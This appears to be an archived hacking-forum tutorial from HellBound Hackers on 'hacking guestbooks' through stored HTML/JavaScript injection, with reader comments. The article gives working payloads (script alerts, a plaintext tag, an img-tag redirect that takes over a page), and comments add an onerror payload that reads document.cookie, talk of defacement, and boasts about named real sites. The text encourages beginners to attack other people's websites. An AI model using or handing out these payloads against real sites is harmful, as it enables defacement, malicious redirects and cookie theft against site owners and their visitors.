HellBound Hackers
Join us at IRC!
It is never to LATE to become what you never WERE.
Thursday, May 17, 2012
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
HellBoundHackers Additional:
Shop
Learn
Communicate
Submit
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Interact
Other
HellBoundHackers Executive:
HellBoundHackers Leisure:
Members Online
Total Online: 34
Web Spiders: 13
Guests Online: 27
Members Online: 7
roodrales, destrox01, barelylistening, interlude, xihuny, p0isoN, stranac

Registered Members: 70039
Newest Member: p0isoN
Latest Articles

Guestbook Hacking



FLV Blaster - Download Music and Videos Faster

website security How to take control of Guestbooks, most commonly guestbook.html



Hacking Guestbooks

Guestbooks are one of the most easly and most common begginer hacks. Because Guestbooks allow users to submit their information onto the website.

So if a guestbook was to not filter html commands, then that information is submitted to the website!!! See where im going with this....

So if you were to input html into your guestbook entry, that will be uploaded to the website, thus giving you control of that page.

So, steps to take when hacking a guestbook:

see if its vunerable! You can do this by inputing tags like:

<plaintext> or <img src="javascblockedript:alert('noob')">

If you get a whole page of code (plaintext) or a message box saying "noob", then the page is vunerable.


So now you can attack the guestbook!

to make a message pop up on the screen, you inject javascblockedript into a <img> tag or a <scblockedript>, but sometimes [scblockedript] is disabled.

so a img tag would be like:
<img src="javascblockedript:alert('noob')">

or if you wanted to redirect the page, you can use another <img> tag:
<img src="javascblockedript:void(window.location=('http://www.google.com'))">
WoW, now that page redirects to your page! simpe huh!!

Be creative, any html command can work!

Happy Hacking.

HellBound Hackers is not responsible for any blackhat hacks you may do.

~ Mr_Cheese ~

Edit by Mr_Cheese: STOP TRYING TO HACK GUESTBOOKS IN MY NAME.
security article Posted by Mr_Cheese on December 14 2004 - 22:59:15   |    16 Comments | 22597 Reads | Print print this tutorial

Comments

BlackAce227 on April 05 2005 - 00:18:02
if u need help just dl my Guestbook Hacker Program
nights_shadow on May 25 2005 - 12:54:43
Why don't you just test it out by putting a real message? html body font color=red blah blah blah etc. then trying the img src=realpicture.jpg That way, you've just tested it for a vulnerability without making you look like you are going to hack it "img src=javascr!pt(etc.)" and the admin comes on line and reports your ip to your isp.
champloo on June 01 2006 - 04:32:51
does it have to be javascblockedript or can i just put in like my html code from m defacment?
Mr_Cheese on July 22 2006 - 00:36:31
any html code will work.
MaW on July 28 2006 - 12:40:09
what dous it mean when i post <img src="javascblockedript:alert('noob')"> and it comes up with a broken image?
Der Heiligen on December 21 2006 - 00:43:41
it means that it's looking for that image and can't find it, so it comes up with a broken image.
anon14 on February 27 2007 - 17:26:57
<img src="javascblockedript:alert('noob')">, where could i use this
koolkeith12345 on March 14 2007 - 19:55:11
good article but its quite hard to find guestbooks as exploitable as that though using an onerror scblockedript in an img tag like this one works in most <img src="asdf" onerror="alert(document.cookie)"/> unfortunately you cant put your own message in the alert because quotes inside quotes screws things up a bit though an infinite js loop and alert document.body.innerHTML
ReTaRDeD on April 27 2007 - 17:20:48
Go to dermatone.com and look at their guestbook! OMF! NINJA :ninja: ***I never said I did it! I am completely innocent until proven else!*** Love you :p
ReTaRDeD on April 29 2007 - 19:31:43
Colorfulsprinkles.com :ninja: [img]javascblockedript:alert('!.PWND By R3T4RD.!')[/img]
loxaXcracker on December 08 2007 - 17:37:14
Damn!! i can't find any epxploitable guest book!! :angry:
japanesedude on September 08 2008 - 21:23:46
LOL, THIS ARTICLE, LOL!
K3174N 420 on October 14 2008 - 20:44:57
quote: Edit by Mr_Cheese: STOP TRYING TO HACK GUESTBOOKS IN MY NAME. ROFL! XD :D:D:D
K3174N 420 on October 14 2008 - 20:46:13
quote: Edit by Mr_Cheese: STOP TRYING TO HACK GUESTBOOKS IN MY NAME. ROFL! XD :D:D:D
japanesedude on December 07 2008 - 14:05:51
HAHAHAHAHAHAHA!! MR_CHEESE, LOL!!! AHHAHAHAH FUCK YOU!!!!
IbaiJoe on April 09 2012 - 17:39:56
This only defaces or redirects you to the deface when someone submits an entry to the guestbook... But how would you edit your entry so that you redirect people from the index page of the site to your deface ?
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.
Ratings
Rating is available to members only.

Please login or register to vote.
Awesome! 33% [2 Votes]
Very Good 17% [1 Vote]
Good 17% [1 Vote]
Average 0% [No Votes]
Poor 33% [2 Votes]
Guest
Username

Password

Remember Me


Bookmark This Page
Affiliates
Adverts

 

 

Links

Anime Wallpaper Site
By using, viewing or obtaining any information contained on this site, you agree to the disclaimer.

© HellBound Hackers 2008- 2009. Since 3rd December 2004.

20561620 Unique Visits

Powered by HBH-Fusion